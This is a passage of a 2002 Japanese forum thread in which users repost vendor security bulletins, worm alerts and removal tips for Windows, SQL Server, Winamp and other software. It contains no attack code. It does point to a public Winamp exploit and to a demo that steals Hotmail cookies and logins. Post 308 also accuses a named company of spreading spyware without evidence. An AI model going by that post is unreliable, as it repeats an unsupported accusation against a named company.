259名無しさん@お腹いっぱい:02/06/30 06:29 ID:BLSw2uMo
バグを仕様、セキュリティーホールを公開実験と言い切るMSの電話サポート
260名無しさん@お腹いっぱい。:02/06/30 07:17 ID:bNLja3rp
ポテチキャラのネーミングを「ひろゆき」に!

ttp://www.yamayoshi.co.jp/
ポテトチップス「うわさのレモンペッパー」のキャラクターの名前を募集しています。
好きなキャラクターの名前を選択して投票してください。
ステキな特製マグカッププレゼント致します。
質問:あなた思うキャラの名前は何?

現在:「ひろゆき」3票。1位獲得まであと185票。

上記コピペしまくりましょう。
261名無しさん@お腹いっぱい。:02/07/03 01:14 ID:???
>>260
山芳製菓株式会社のホームページへのアクセスに
よるデータの流出についてのお詫びとご報告

平成14年7月2日

山芳製菓株式会社のホームページサーバーより、ホームページ上の

「うわさのレモンペッパーキャンペーン」に、ご応募頂いたデータ
が流出するという事態が発生し、皆様にご迷惑をお掛けしたことを
深くお詫び申し上げます。そのような事態が発生致しましたのは、
弊社ホームページ上のセキュリティ管理の甘さに原因があったと、
深く反省しております。

この件に関する窓口と致しまして、専用ホットラインのメールアド
レスを設定させて頂きます。(下記ご参照お願い申し上げます。)
セキュリティを強化し今後このようなことがないよう対応してまい
りたいと思います。そのため、しばらくの間ホームページは閉鎖さ
せていただきますのでご了承お願い致します。
262名無しさん@お腹いっぱい:02/07/03 05:36 ID:S56/p5dQ
Windowsはスパイウェアです。プライバシー漏洩が仕事です。
セキュリティーとはプライバシー漏洩を妨げるルーターやファイアーウォールを駆逐することです。
ウィルスはWindowsの友達です。
263http://js-web.cside.com/index.html:02/07/03 05:48 ID:lwe+XVgh
264むむむ ◆MUMUMU4w :02/07/04 22:14 ID:+E9Mng2X
■Windows NT/2000/XP のセキュリティパッチ(MS02-029)が更新、再適用が必要な模様

>>199 で報告した、MS02-029 が本日付で更新されています。
パッチのアップデートがあった模様。パッチの再適用が必要になるようです。

情報元(有料サイト):
http://www.computerworld.jp/contents/subscribed/200207/20020704ms2.html

以下、http://www.microsoft.com/japan/technet/security/bulletin/ms02-029.asp
より引用:

-- 引用開始
リモート アクセス サービスの電話帳の未チェックのバッファによりコードが実行される
(Q318138) (MS02-029)

登録日 : 2002/6/13
更新日 : 2002/7/4

概要 :
このセキュリティ情報の対象となるユーザー : MicrosoftR Windows NTR、WindowsR
2000 および Windows XP を使用しているお客様

脆弱性の影響 : ローカルでの権限の昇格

最大深刻度 : 高

推奨する対応策 : 管理者は、特権を持たないユーザーが対話的にログオンすることが
できるマシン (ワークステーションや Terminal Server など) に修正プログラムを適用して
下さい。

影響を受けるソフトウェア :

Microsoft Windows NT 4.0
Microsoft Windows NT 4.0 Terminal Server Edition
Microsoft Windows 2000
Microsoft Windows XP

Windows NT 4.0 Service Pack 6 または NT 4.0 Terminal Server Edition Service Pack 6
にインストールできる Microsoft Routing and Remote Access Server (英語版のみ :
こちらの製品は日本語版は存在しませんので、ご注意ください。提供される修正プログラム
も英語版のみです。本セキュリティ情報の英語版を、併せてご参照ください。)

問題 :
技術的な説明 :

2002 年 6月 12 日 (米国日付)、マイクロソフトはこのセキュリティ情報の最初のバージョン
をリリースしました。2002年 7 月 2 日 (米国日付)、この問題に対する修正プログラムが
更新され、入手可能になったことをお知らせするため、このセキュリティ情報を更新しました。
この問題に対する最初の修正プログラムでは、この脆弱性を完全に排除することができ
ましたが、管理者以外のユーザーが VPN 接続を確立することができなくなることがある、
という別の影響が発生しました。更新版の修正プログラムは、VPN 接続を適切に処理
します。更新版の修正プログラムは、ダウンロード センターから今すぐダウンロードする
ことができ、Windows アップデートからは間もなく入手可能になる予定です。
265名無しさん@お腹いっぱい:02/07/04 22:18 ID:5mn0RoMV
パンチョ伊東死去
266むむむ ◆MUMUMU4w :02/07/04 22:33 ID:+E9Mng2X
>>264
WinXPとWin2000日本語版のパッチはとりあえず(まだ?)更新されてない模様。
267名無しさん@お腹いっぱい:02/07/05 07:04 ID:vlu1LIqg
セキュリティーホールが恐かったらMS製品は使うな。
268名無しさん@お腹いっぱい。:02/07/05 15:01 ID:???
>>267
怖いんではなくて、楽しんでいるんでし。
269むむむ ◆MUMUMU4w :02/07/10 21:51 ID:56KqQXVj
■WinAMPにセキュリティホール、Exploitコードが公開

--- 引用開始
Summary
Winamp includes an option, enabled by default, which checks on startup for the latest
version from http://www.winamp.com and will then notify the user of a possible
upgrade via a message box. Unfortunately, if it were to receive a huge response,
the thread parsing the data is thrown into an infinite loop and eventually the exception
dispatcher is called. Then like most of the time, an overflow will occur.
--- 引用終了

以上、Remote Winamp Exploit (Product Updates)
http://www.securiteam.com/exploits/5BP07207PE.html (英語)
より一部引用。

既に上記サイトに C のコードも出ています。注意されたし。
270名無しさん@お腹いっぱい。:02/07/10 22:25 ID:???
なんだか知らんが、奇っ怪なインデントをしてるソースだなぁ・・・
アメリカ人はこんなコーディングをするんだろうか。
271 :02/07/10 22:33 ID:???
>>270
全然奇っ怪でも何でもないじゃん。GPLなソフトのソースよりはずっと読みやすいぞ。
272名無しさん@お腹いっぱい。:02/07/10 23:20 ID:???
>>271
ん?無茶苦茶ズレて見えるんだけどナ。
ブラウザのせいかな。
273kng ◆GyIb9mrY :02/07/11 10:40 ID:???
最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-034ov.asp

MS02-034 に関する情報
「MS02-034: SQL Server 7.0 および SQL Server 2000 用の累積的なプログラム
(Q322853)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この問題は、下記対象となる製品に含まれる未チェックのバッファにより、
不正なプログラムの実行および権限の昇格が行われる可能性があります。
これらが悪用される事で、悪意のあるユーザーによりお客様のコンピュータ上で
任意のプログラムを高い権限の下で実行される可能性があります。

対象となる製品
==============
・ Microsoft SQL Server 2000
・ Microsoft SQL Server Desktop Engine (MSDE) 2000


修正プログラム
==============
・ Microsoft SQL Server 2000
http://download.microsoft.com/download/SQLSVR2000/Update/8.00.0650/W98NT42KMeXP/JA/8.00.0650_jpn.exe
Microsoft SQL 2000 Service Pack 2 の環境にインストールすることが
可能です。


詳細
====
この修正プログラムをインストールすることにより、悪意のあるユーザーによる
以下の攻撃を防ぐことができます。

(中) 資格情報を暗号化するためのプロシージャの脆弱性を悪用しバッファの
オーバーラン攻撃が行われる可能性のある問題です。
(中) SQL Server テーブルのデータの一括アップデートの処理の脆弱性を
悪用しバッファのオーバーラン攻撃が行われる可能性のある問題です。
(中) SQL Server が使用するレジストリキーへのアクセス権が
不適切であったために、悪意のあるユーザーにより、サービスアカウントと
同等の権限を取得される可能性がある問題です。

対策が行われていないシステムがインターネットなどのネットワークを通じて、
他のコンピュータと接続している場合、この問題を使用した悪影響を
受けることがあります。 この攻撃は、ハッカーまたはクラッカーと呼ばれる
悪意のあるユーザーや、ワームといった自動的な攻撃を目的とした悪意のある
プログラムから行われることがあります。

・ 意図しないアプリケーションが動作させられる可能性があります
(ハードディスクのフォーマットやワームなど)
・ 意図しないスクリプトが動作させられる可能性があります
・ データベース内のデータを閲覧・操作される可能性があります。
・ データベースを異常終了させられる可能性があります。
・ 異常終了が原因で、データベース内のデータに不整合が発生する可能性があります。

日本語による詳細については、ただいま準備中です。
それまでの間、英語情報をご参照ください。

MS02-034: Cumulative Patch for SQL Server 7.0 and SQL Server 2000 (Q322853)
http://www.microsoft.com/technet/security/bulletin/MS02-034.asp
274 ◆eGijCrAo :02/07/11 10:46 ID:???
MS02-035 に関する情報
「MS02-035: SQL Server のインストール プロセスで、暗号化した管理者の
パスワードがシステムに残る (Q263968)」 に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。


概要
====
Microsoft SQL Server をインストールする際に、認証モードに「混合モード」を
選択した場合、セットアップファイルに管理者 (sa) のパスワードが
保存される問題です。 最悪の場合、悪意のあるユーザーにお客様の
Microsoft SQL Server の管理者パスワードを入手される可能性があります。


対象となる製品
==============
・ Microsoft SQL Server 7
・ Microsoft Data Engine 1.0 (MSDE 1.0)
・ Microsoft SQL Server 2000


修正プログラム
==============
KillPwd.exe を使用することによって、セットアップファイルに残った
管理者 (sa) のパスワードを削除します。

・ Microsoft SQL 7 、MSDE 1.0 and Microsoft SQL 2000

http://download.microsoft.com/download/SQLSVR2000/Utility/2.0/W98NT42KMeXP/EN-US/killpwd.exe

Killpwd.exe の詳細に関しましては、次のサポート技術情報を
参照ください。
JP263968: [FIX] Service Pack インストール時に標準セキュリティのパスワードが
保存される
http://www.microsoft.com/japan/support/kb/articles/JP263/9/68.asp


詳細
====
この修正プログラムをインストールすることにより、
悪意のあるユーザーによる以下の攻撃を防ぐことができます。

(中)混合モードでインストールされた Microsoft SQL Server の
セットアップファイルに、管理者 (sa) のパスワードが保存される問題です。

上記の問題を悪用されることにより以下のような実害を受ける可能性があります。

・ 実行する意図が無いアプリケーションが動作させられる可能性があります
(ハードディスクのフォーマットやワームなど)
・ 実行する意図が無いスクリプトが動作させられる可能性があります
・ SQL Server の管理者権限を取得される可能性があります

日本語による詳細については、ただいま準備中です。
それまでの間、英語情報をご参照ください。

MS02-035: SQL Installation Process May Leave Encrypted Administrator
Password on System (Q263968)
http://www.microsoft.com/technet/security/bulletin/MS02-035.asp

275名無しさん@お腹いっぱい。:02/07/11 14:17 ID:???
>>272
<PRE>で書いてくれって感じだよな・・・。
276名無しさん@お腹いっぱい。:02/07/12 09:51 ID:yRpIVQ2I
277名無しさん@お腹いっぱい。:02/07/13 00:48 ID:???
>>276
詳細はこちら。

http://www.zdnet.co.jp/news/0207/12/ne00_iebug.html

ZDNN
2002年7月12日 01:34 PM 更新
セキュリティ専門家、IE/Outlookのバグに警告
IEとOutlookで、新たなセキュリティホールが発見された。
パッチのリリースはまだだが、情報 が既に行き渡っているという理由で、
セキュリティ専門家が公表に踏み切った
278むむむ ◆MUMUMU4w :02/07/13 00:59 ID:P/3TgfL1
■『Outlook』用のPGPプラグインにも侵入経路

 米マイクロソフトの電子メールクライアント・ソフト『Outlook』で広く使われているプラグ
インに、セキュリティーホールが発見された。ユーザーがメールを暗号化し、デジタル署名
を付けるためのプラグインの不具合が原因で、Outlookユーザーがハッカー攻撃にさらさ
れる危険性がある。

 セキュリティー企業のイーアイ・デジタル・セキュリティーは10日(米国時間)午後、米
ネットワークアソシエイツが開発したOutlook用のプラグイン、『Pretty Good Privacy』
(PGP)のユーザーに警告を発した。ハッカーがPGPのセキュリティーホールから侵入し、
被害者のコンピューターで有害なソフトウェアを実行する危険性があるという。ネットワーク
アソシエイツも10日、この問題に対処するパッチを公開した。
(以上、2002年7月13日のCNET Japan Tech Newsより一部引用―全文は引用元を参照)

引用元: http://japan.cnet.com/Enterprise/News/2002/Item/020712-2.html?me
NAIのパッチ: http://www.nai.com/naicommon/download/upgrade/patches/patch-pgphotfix.asp
279むむむ ◆MUMUMU4w :02/07/13 01:11 ID:P/3TgfL1
■RealOne Player Gold および RealJukebox 2 のバッファ オーバーフローに関する脆弱性

2002 年 7 月 10 日更新
2002 年 6 月 17 日に RealJukebox 2 および RealOne Player Gold に影響を与えるセキュ
リティホールがRealNetworks に報告されました。

内容:
1. 「バッファオーバーラン」として知られているセキュリティホールによって、攻撃者により、
ユーザーのマシン上で任意のコードが実行される恐れがあります。

2. 攻撃者は、My Computer のセキュリティ領域に HTML ページをロードし、ユーザーの
マシンでコードを実行することにより、ブラウザのセキュリティ設定をすり抜けることが可能
です。

現在のところ、実際にこのセキュリティホールによって攻撃されたという報告は受けており
ませんが、RealNetworks ではこの問題を特定し、修正いたしました。
(中略)
影響を受けるソフトウェア:

RealOne Player Gold
Windows 用英語(US)版 バージョン6.0.10.505

RealJukebox2
Windows 用 日本語版 バージョン1.0.2.379
Windows 用 英語(US)版 バージョン1.0.2.340

RealJukebox 2 Plus
Windows 用 日本語版 バージョン1.0.2.379
Windows 用 英語(US)版 バージョン1.0.2.340
(以上、RealNetworksサポートサイトより一部引用―全文は引用元を参照)

引用元: http://service.jp.real.com/help/faq/security/rjb2.html
280名無しさん@お腹いっぱい。:02/07/13 01:38 ID:kvjf1pPr
こうしてみてみると、セキュリティーホールやらバグやら多すぎ
281名無しさん@お腹ぐるぐる:02/07/13 13:00 ID:VMUtPCoc
Intel サーバおちてませんか
282むむむ ◆MUMUMU4w :02/07/15 16:43 ID:orOUoNFJ
いくつかのメーリングリスト等の情報によると、本日午後(日本時間)あたりから、
WORM_FRETHEMの亜種と思われるウイルスが、強烈に繁殖しはじめているようです。

http://www.symantec.com/avcenter/venc/data/[email protected]
http://www.nai.com/japan/virusinfo/virF.asp?v=W32/Frethem.k@MM
283むむむ ◆MUMUMU4w :02/07/15 17:17 ID:orOUoNFJ
>>282
日経BP ITProにも情報出ました。

「Re:Your Password!」の件名に注意,新種ウイルスが国内で流行の兆し
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020715/1/
284名無しさん@お腹いっぱい。:02/07/15 18:48 ID:KmXtLdb1
>>282-283
お疲れ様です
いつもありがとうございます
285マカー:02/07/15 18:58 ID:TF+ZSQom
今日はウィルスですか
ウィナーは毎日大変ですね(プッ
286名無しさん@お腹いっぱい。:02/07/15 20:33 ID:4WQTacLn
ははは
287名無しさん@お腹いっぱい。:02/07/15 20:56 ID:???
sage
288名無しさん@お腹いっぱい:02/07/15 22:53 ID:zG/IpKvd
2ちゃんから何かニュース出ました?
289名無しさん@お腹いっぱい。:02/07/15 22:58 ID:oX2A4OZi
>>238-238
家にも来た!このウィルス
OutlookExpressアップデートしてたから、
被害は無いが、
念の為スキャンしたりで禿げしく鬱

皆さんもWindowsUpdateは細めに!
もしくは、IEとOEは使うな。
290名無しさん@お腹いっぱい。:02/07/15 23:11 ID:CXhXQ/GS
>>289
マジ?
よかったッ!! 
俺、友達いなくて・・・
291名無しさん@お腹いっぱい。:02/07/15 23:12 ID:4W0QKGT5
292名無しさん@お腹いっぱい。:02/07/15 23:20 ID:gIES7VDJ
>>282
全く知らんメアドからこのメールきた。
fromヘッダ偽装すんの?偽装したようなメアドじゃなかったけど。
293名無しさん@お腹いっぱい。:02/07/15 23:37 ID:N2w2rhrM
>>292
最近のウイルスはIEのキャッシュからメアドを拾ってくるようですので。。
294名無しさん@お腹いっぱい。:02/07/15 23:56 ID:gIES7VDJ
>>293
http://www.nai.com/japan/virusinfo/infoFrethem.asp
見る限りじゃ、このウィルス(ワーム)は違うとおもうが。

それに、SMTPサーバを探しにいくってことは、こいつ自身にSMTP
の機能がないわけで。
SMTPサーバって下手なfromヘッダがついてた場合送信しないように
しとくのが一般的な設定のだから、感染したマシンの利用者のメアド
をfromに使って送信するのが普通じゃないの?

といってみるてすと

295「Re: Your password!」 :02/07/15 23:58 ID:???
296名無しさん@お腹いっぱい。:02/07/16 06:29 ID:???
うわ〜「Re:Your Password!」モロに感染してしまいました・・鬱
どうすればいいんでしょうか?
297名無しさん@お腹いっぱい。:02/07/16 07:49 ID:???
298ひよこ@525:02/07/16 07:58 ID:eEORyHpK
>>296
窓からPCを投げ(以下略
299ぴょんた:02/07/16 10:18 ID:NasO/gud
夏です。夏

というわけで
今ここでは見るだけで
涼しくなるサイトの特集を
やってます。是非遊びに来て
ください。暇つぶしにはもってこいかも

http://chemical-x.net/
300むむむ ◆MUMUMU4w :02/07/16 11:38 ID:k0zmKt1e
■Norton Personal Internet Firewall (Notron Internet Security 2001)に脆弱性

某メーリングリストからの情報。HTTP Proxy にバッファオーバーフローの問題。

情報元アーカイブ(英語):
http://archives.neohapsis.com/archives/vulnwatch/2002-q3/0026.html
シマンテックの公式回答(英語):
http://securityresponse.symantec.com/avcenter/security/Content/2002.07.15.html

ざっと読んでみたところ、Norton Internet Security 2001 シリーズは脆弱性ありで、
最新の 2002 では問題ない模様。
301名無しさん@お腹いっぱい。:02/07/16 14:58 ID:IIRuuNaw
W32/Frethem.k@MM
このウィルス、昨日あたりからキョーレツに流行ってるみたい。
かなりしっかりしたウィルス対策してる会社でも
感染した輩がいたよ。んでもってウチにも今朝、そのウィルス
メールが来てた。件名ですぐ分かったから速攻削除したけど…。
302名無しさん@お腹いっぱい。:02/07/16 16:47 ID:bDI7plCr
IEのセキュリティを突くようなデモをしているサイトを
教えて欲しいのですが・・・。
303名無しさん@お腹いっぱい。:02/07/17 00:23 ID:???
>>296
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=4305

というか、感染したの分かったら一番先にネットワークから切断汁。
304名無しさん@お腹いっぱい。:02/07/17 00:27 ID:Vf6cNc7n
俺もメール来てオンラインスキャンで検索したら感染されてなかったけど
だいじょうぶかな、不安。誰か教えて下さい。
305名無しさん@お腹いっぱい。:02/07/17 00:41 ID:???
>>304
来たメールをどう扱ったかによる。あと、使ってるメーラー。
その辺教えてくれないとなんとも言いようがない。
306304:02/07/17 00:46 ID:Vf6cNc7n
>>305
レスありがとうございます

メールは見ただけなんですが、添付ファイルは開いてません。
あと、outlookです。
オンラインウィルススキャンでだいじょうぶでも実際は感染してる事って
あるんですか?
307名無しさん@お腹いっぱい。:02/07/17 00:59 ID:???
>>306
以下、トレンドマイクロのページより。

--
・侵入方法:
ワームは通常メールの添付ファイルとしてユーザのコンピュータに侵入します。
IEのセキュリティホ ールを狙ったダイレクトアクション活動を行いますので
添付ファイルを実行したつもりがなくともワー ムが活動してしまう場合があります。
--

という事で、添付ファイル実行しなくても危険かも。
で、

--
・感染確認方法:
ワームが活動してしまった場合には、以下のファイルが作成されます:
<Windowsディレクトリ>¥Taskbar.exe
--

これ確認汁。win98/me/xp とかなら c:\windows、nt/2000 だと c:;\winnt。
まぁ、オンラインスキャンかけて大丈夫なら OK だと思うけど。
308名無しさん@お腹いっぱい。:02/07/17 02:45 ID:ewA1qeI5
■危険■PCから個人情報を盗むデートクラブ■危険■

悪質な出会い系クラブを発見したので日本全国に告発します。
■■■ Club-Cosmo ■■■
コスモライフとホテルニューオータニが提案する新しいライフスタイル
http://www.trust-system.co.jp/club-cosmo/index.htm

以下のソフトはスパイウエアです。この出会い系クラブの目的は
PCに記録されている会員の個人的な嗜好を勝手に抜き取って、別
の商売に転用することである疑いが濃厚です。

a)会員専用のコミュニケーションソフトウェア
http://www.trust-system.co.jp/club-cosmo/download_files/cosmo_viewer.exe

b)USBキー認証ツール
http://www.trust-system.co.jp/club-cosmo/download_files/RainbowSSD5.39.2.exe


これらのプログラムを開発したのはトラストシステムという企業です。
地図の模型を作っているようですが、実績を見ると何でも屋のようです。
http://www.trust-system.co.jp/
この企業の求人案内
http://www.trust-system.co.jp/recruite.htm
問い合わせ
http://www.trust-system.co.jp/toiawase.htm

ソフトを解析すれば私の告発が的を得ていることが証明できるでしょう。
309304:02/07/17 13:00 ID:OjcQLbIq
>>307
遅レスですいません

添付開かなくても感染するんですよね、作成ファイルを確認したところ大丈夫でした
いろいろと教えて頂いてありがとうございました、助かりました!
310名無しさん@お腹いっぱい。:02/07/18 01:18 ID:P/k5cP9K
WORM_FRETHEM.Kに
感染してしまいました。オンラインスキャン
で検出したのですが、削除しようとすると
使用中の為削除できませんと出てしまいます。
どうすれば良いのでしょうか。マジレスお願いします。
311名無しさん@お腹いっぱい。:02/07/18 01:27 ID:???
>>310
>>303 を試す
・セーフモードで起動して削除
・DOSの起動ディスク作ってDOSで起動してDELコマンドで削除

漏れは寝るんで後は誰かよろしく
312これってなんでしょうか?:02/07/18 01:29 ID:y04HqrZj
誰か教えてください。
この質問をソニーの社員スレッドでしたのですが全然回答がありませんでした。
なにか重大な秘密があるのでしょうか?
私はVAIOを使ってます。
最近監視ソフト買いました。
毎日インターネットつなげるとアタックの警告音とともにVAIOの方から勝手に
パソコンの中に何度も進入してきます。
私のパソコンの中でいったい何をしているのでしょうか?
ソニーさんのパソコンを使うと勝手にパソコンに侵入してこれるように
何かしているのでしょうか?
侵入の警告音がなりっぱなして気持ち悪いです。
313名無しさん@お腹いっぱい。:02/07/18 01:30 ID:ZNU+KZty
更新されていないようです。

http://www.twin.ne.jp/~logner/INDEX.HTM
314名無しさん@お腹いっぱい。:02/07/18 13:44 ID:???
>>312
( ゚д゚)ポカーン
VAIOから攻撃されているという根拠は?
だいいち、自分のパソコンが自分のパソコンに攻撃できると思う?
どうせポートスキャンでもくらっているのだろう
315むむむ ◆MUMUMU4w :02/07/18 14:40 ID:gBTxHBzv
■Macromedia Sitespring にクロスサイトスクリプティングの脆弱性

参照: http://archives.neohapsis.com/archives/vulnwatch/2002-q3/0029.html

ベンダーパッチは出ていない(上記には「出る予定は知らない」とあり)模様。
316むむむ ◆MUMUMU4w :02/07/18 14:57 ID:gBTxHBzv
■GFI Software Ltd.、eメールの脅威に対抗するエクスプロイト エンジンをリリース

GFI Software Ltdが、Exchangeサーバ/SMTPサーバ用のeメール セキュリティ製品、
GFI MailSecurity for Exchange/SMTPを発表した。同製品にはeメール エクスプロイ
エンジンが提供されており、eメールに埋め込まれた脆弱性につけこむ部分(エクス
プロイト)を検出し、既知のエクスプロイトで攻撃する現在および将来のウィルスから
ユーザを保護する。

エクスプロイトが埋め込まれたeメールをユーザが受信したり開いたりすると、ウィルスが
ユーザのマシン上で実行されてしまう。悪意のあるハッカーはこの手法を使って、ファイア
ウォールやアンチウィルス製品をすり抜ける。

アンチウィルス ソフトウェアは既知の悪意のあるコードを検出するが、eメール エクス
プロイト エンジンは、eメールに対する侵入検知システム(IDS)のように機能し、コードを
分析して悪意のあるエクスプロイトを発見する。これにより、新しいウィルスだけでなく、
未知のウィルスや悪意のあるコードからもユーザを保護できる。
(以上、2002年7月18日のGMO Silicon Valley Expressより一部引用―全文は引用元を参照
)

引用元: http://sve.gmo.jp/a.php?i=1479
GFI: http://www.gfi.com/
317いつも名無し:02/07/26 15:33 ID:???
ここ1週間何もなしか。平和でよし
318名無しさん@お腹いっぱい。:02/07/27 13:31 ID:???
良スレあげ
319名無しさん@お腹いっぱい。:02/07/27 19:42 ID:rJJPcyg0
>>317
平和というより、アップデートパッチの開発が滞ってるだけかと。
320むむむ ◆MUMUMU4w :02/07/29 13:09 ID:CW4yZDlS
■Hotmail.com のクッキーとユーザログインを盗み取る「デモ」が公開される

デモンストレーションURL:
http://drorshalev.brinkster.net/dev/hotmail/
321むむむ ◆MUMUMU4w :02/07/29 13:11 ID:CW4yZDlS
# 以下4つ、少し古い情報でスマソ。

■Microsoft Metadirectory Services 2.2(英語版)に脆弱性 (MS02-036)

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-036ov.asp

MS02-036 に関する情報
「MS02-036: Microsoft Metadirectory Services の認証問題により、
権限が昇格する(Q317138)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この問題は、Microsoft Metadirectory Services (MMS) のデータに
MMS 管理者以外のユーザーによってアクセスされる可能性がある問題です。
最悪の場合、悪意のあるユーザーに、 MMS のデータを操作される可能性が
あります。

MMS は、Active Directory や既存のディレクトリサービス、データーベースや
Exchange Server などの異なる種類のデータレポジトリの相互運用と
集中管理のためのソリューションです。
現在のバージョンの MMS は、日本国内に向けた販売は行っておりません。

・ Microsoft Metadirectory Services (英語)
http://www.microsoft.com/windows2000/technologies/directory/MMS/

対象となる製品
==============
・ Microsoft Metadirectory Services 2.2

修正プログラム
==============
・ Microsoft Metadirectory Services 2.2 (英語版)
http://download.microsoft.com/download/mms22/Patch/Q317138/NT5/EN-US/Q317138.EXE

この修正プログラムは MMS 2.2 Service Pack 1 を実行しているシステムに
インストールすることができます。

注意: MMS は英語版製品のみが提供されております。
そのため、日本語版修正プログラムはございません。
322むむむ ◆MUMUMU4w :02/07/29 13:55 ID:CW4yZDlS
■Microsoft Exchange Server 5.5に脆弱性

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-037ov.asp

MS02-037 に関する情報
「MS02-037: SMTP クライアント EHLO コマンドへのサーバー応答で、
バッファ オーバーランが発生する (Q326322)」 に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この問題は、下記対象となる製品に含まれる未チェックのバッファにより、
不正なプログラムが実行される可能性がある問題です。最悪の場合、
悪意のあるユーザーにお客様のコンピュータ上で任意のプログラムが
実行される可能性があります。

対象となる製品
==============
・ Microsoft Exchange Server 5.5

修正プログラム
==============
・ Microsoft Exchange Server 5.5
http://download.microsoft.com/download/exch55/Patch/05.05.59.2656/NT45/JA/Q326322jpni386.EXE
323むむむ ◆MUMUMU4w :02/07/29 13:56 ID:CW4yZDlS
■Microsoft SQL Server 2000にセキュリティホール (MS02-038)

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-038ov.asp

MS02-038 に関する情報
「MS02-038: SQL Server 2000 Service Pack 2 用の累積的な修正プログラム
(Q316333)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この問題は、下記対象となる製品に含まれる未チェックのバッファにより、
不正なプログラムの実行および権限の昇格が行われる可能性があります。
これらが悪用される事で、悪意のあるユーザーによりお客様の
コンピュータ上で任意のプログラムを高い権限の下で実行される
可能性があります。

対象となる製品
==============
・ Microsoft SQL Server 2000
・ Microsoft SQL Server Desktop Engine (MSDE) 2000

修正プログラム
==============
・ Microsoft SQL Server 2000
http://download.microsoft.com/download/SQLSVR2000/Update/8.00.0655/W98NT42KMeXP/JA/8.00.0655_jpn.exe
Microsoft SQL 2000 Service Pack 2 の環境にインストールすることが可能です。
324むむむ ◆MUMUMU4w :02/07/29 13:57 ID:CW4yZDlS
■Microsoft SQL Server 2000 にセキュリティホール (MS02-039)

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-039ov.asp

MS02-039 に関する情報
「MS02-039: Buffer Overruns in SQL Server 2000 Resolution Service Could
Enable Code Execution (Q323875)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この問題は、下記対象となる製品に含まれる未チェックのバッファにより、
不正なプログラムの実行が行われる可能性および、サービスの提供が
妨害される可能性があります。これらが悪用される事で、悪意のあるユーザー
によりお客様のコンピュータ上で任意のプログラムの実行および、
パフォーマンスを著しく低下させられる可能性があります。

対象となる製品
==============
・ Microsoft SQL Server 2000
・ Microsoft SQL Server Desktop Engine (MSDE) 2000

修正プログラム
==============
・ Microsoft SQL Server 2000
http://download.microsoft.com/download/SQLSVR2000/Patch/Q323875/W98NT42KMeXP/JA/Q323875_SQL2000_SP2_jpn.EXE
Microsoft SQL 2000 Service Pack 2 の環境にインストールすることが可能です。
325むむむ ◆MUMUMU4w :02/07/29 15:02 ID:CW4yZDlS
■Windows Media Player のセキュリティパッチが更新
# 既にWindows Updateにも出ています。

最新情報は次のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-032.asp

================================================================
今回の更新内容
このセキュリティ情報ページを改訂し、MS01-056 で提供された修正プログラムに
不足していたファイルがあったことをお知らせしました。マイクロソフトは
修正プログラムを再パッケージし、不足していたファイルを含め、確実な累積的な
修正プログラムとして再リリースしました。
また、「すべての問題の総合的な深刻度」 を示す表を修正しました。
================================================================

2002 年 6 月 26 日 Windows Media Player 用の累積的な修正プログラム
(Q320920) (MS02-032)

登録日 : 2002/6/27
更新日 : 2002/7/26

概要 :
このセキュリティ情報の対象となるユーザー : Microsoft(R) Windows Media
(TM) Player 6.4、7.1 または Windows Media Player for Windows XP を
使用しているお客様
(中略)
最大深刻度 : 高
(中略)
影響を受けるソフトウェア :
・ Microsoft Windows Media Player 6.4
・ Microsoft Windows Media Player 7.1
・ Microsoft Windows Media Player for Windows XP

技術的な説明 :
2002 年 6 月 26 日 (米国日付)、マイクロソフトはこのセキュリティ情報の
最初のバージョンをリリースし、累積的な修正プログラムとして提供された
修正プログラムであると説明しました。その後、マイクロソフトは修正
プログラムにファイルが不足していたことを発見しました。次に説明する新し
い脆弱性に対する修正プログラムとして、不足していたファイルによる影響は
ありませんが、提供した修正プログラムは累積的ではなかったということに
なります。具体的には、最初の修正プログラムはマイクロソフト
セキュリティ情報 MS01-056 で説明したすべての修正を含んでいませんでした。
(以下略)
326マックユーザー:02/07/29 15:56 ID:/tQqdN2V
毎日ご苦労様
Windowsってのは仕事してるんだかセキュリティ対策してるんだか…
327名無しさん@お腹いっぱい。:02/07/29 17:41 ID:???
>>326
カエレ
328名無しさん@お腹いっぱい。:02/07/29 18:40 ID:???
ttp://www.zdnet.co.jp/news/0207/11/cead_somogyi.html

マカーは単に放置されてただけでは。
329327:02/07/29 19:52 ID:???
スマソ。つられてしまい増田
330むむむ ◆MUMUMU4w :02/07/29 21:45 ID:EOFazFzP
■IEとWindows Media Playerのセキュリティホールを利用したウイルス

 トレンドマイクロは、新種ウイルス「WORM_MANYMIZE.A(メニーマイズ)」の発見を報告
した。Internet Explorer(IE)とWindows Media Playerそれぞれのセキュリティホールを
利用したウイルスのため、注意が必要であるという。

 このウイルスは、件名が「How are you !! <受信者名>」「My friend, <受信者名>」
「Hello <受信者名>」「Dear <受信者名>」のいずれかであり、「mi2.exe」「mi2.chm」
「mi2.htm」「mi2.wmv」という4つのファイルが添付されたEメールとしてユーザーのもとに
送付される。IEのバージョンが古い場合、Eメールをプレビュー表示するだけで
WORM_MANYMIZE.Aに感染してしまう。また、Windows Media Playerの脆弱性も利用
しており、添付された4つのファイルのうち、「mi2.wmv」を実行した場合もウイルスに
感染する。トレンドマイクロによれば、Windows Media Playerのセキュリティホールを
利用したウイルスは初めてであり、今後このようなウイルスがインターネット上に公開
されることで被害が拡大していくおそれがあるとしている。
(以上、2002年7月29日のBroadband Watchより一部引用―全文は引用元を参照)

引用元: http://www.watch.impress.co.jp/broadband/news/2002/07/29/manymize.htm
331むむむ ◆MUMUMU4w :02/07/29 23:23 ID:EOFazFzP
